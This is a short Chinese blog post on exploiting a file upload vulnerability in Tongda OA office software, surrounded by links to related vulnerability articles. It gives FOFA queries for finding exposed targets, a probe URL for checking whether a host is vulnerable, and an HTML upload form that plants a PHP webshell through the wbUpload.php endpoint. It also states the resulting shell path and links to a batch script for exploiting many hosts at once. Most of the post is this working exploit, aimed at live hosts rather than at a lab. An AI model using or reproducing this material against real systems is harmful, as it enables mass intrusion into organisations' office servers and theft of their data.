通达OA文件上传漏洞

作者: q1ya | 来源:发表于2019-10-23 13:33 被阅读0次

通达OA文件上传漏洞
2021-01-14致远OA ajaxAction formul
致远OA ajaxAction formulaManager 文
通达OA漏洞远程代码执行漏洞复现
2020-08-22通达OA多枚0day漏洞复现
通达OA文件上传+文件包含RCE
通达OA任意文件上传+RCE
2018-08-10 web渗透（完）
文件上传(upload-labs详细全解)
网络安全漏洞分析小结

0x01 fofa收集目标

title="网络智能办公管理系统"
app="通达OA"

0x02测试是否存在上传漏洞

访问[ip地址:端口]/general/vmeet/wbUpload.php
响应200，则可能存在漏洞

0x03通过脚本上传shell

脚本内容

<form enctype="multipart/form-data" action="ip+端口/general/vmeet/wbUpload.php?fileName=test.php+" method="post">

<input type="file" name="Filedata" size="50"><br>

<input type="submit" value="Upload">

</form>

以ma.jpg形式上传，上传后自动帮你重命名为test.php
上传成功后webshell路径为
ip+端口/general/vmeet/wbUpload/test.php

0x04编写批量脚本

链接
https://github.com/qiya7/daily-code/blob/master/fofa_tongdaOA.py

通达OA文件上传漏洞
0x01 fofa收集目标 title="网络智能办公管理系统"app="通达OA" 0x02测试是否存在上传漏洞...
2021-01-14致远OA ajaxAction formul
致远OA ajaxAction formulaManager 文件上传漏洞一、漏洞描述致远OA是一套办公协同软...
致远OA ajaxAction formulaManager 文
漏洞描述致远OA是一套办公协同软件。近日，阿里云应急响应中心监控到致远OA ajaxAction 文件上传漏洞利...
通达OA漏洞远程代码执行漏洞复现
漏洞描述通达OA是一套办公系统。近日通达OA官方在官方论坛披露了近期一起通达OA用户服务器遭受勒索病毒攻击事件。...
2020-08-22通达OA多枚0day漏洞复现
通达OA多枚0day漏洞复现刚刚群里发了一篇文章-研究复现一波，通达OA多枚0day漏洞poc出来了。影响范...
通达OA文件上传+文件包含RCE
漏洞概述通达OA（Office Anywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公...
通达OA任意文件上传+RCE
0x01 影响版本 V11 2017版 2016版 2015版 2013增强版 2013版复现使用版本 11.3 ...
2018-08-10 web渗透（完）
今天主要学习的是文件上传漏洞和xss漏洞文件上传漏洞【漏洞描述】文件上传漏洞是指网络攻击者上传了一个可执行的...
文件上传(upload-labs详细全解)
文件上传漏洞常见的漏洞分类服务器配置不当导致文件上传开源编辑器存在上传漏洞本地文件上传限制可以上传被绕过服务器端...
网络安全漏洞分析小结
(一) 前言这里感谢师傅前面整理的通达OA一些版本的漏洞复现，这里从漏洞点出发，分析漏洞，从中学些一些师傅白盒挖...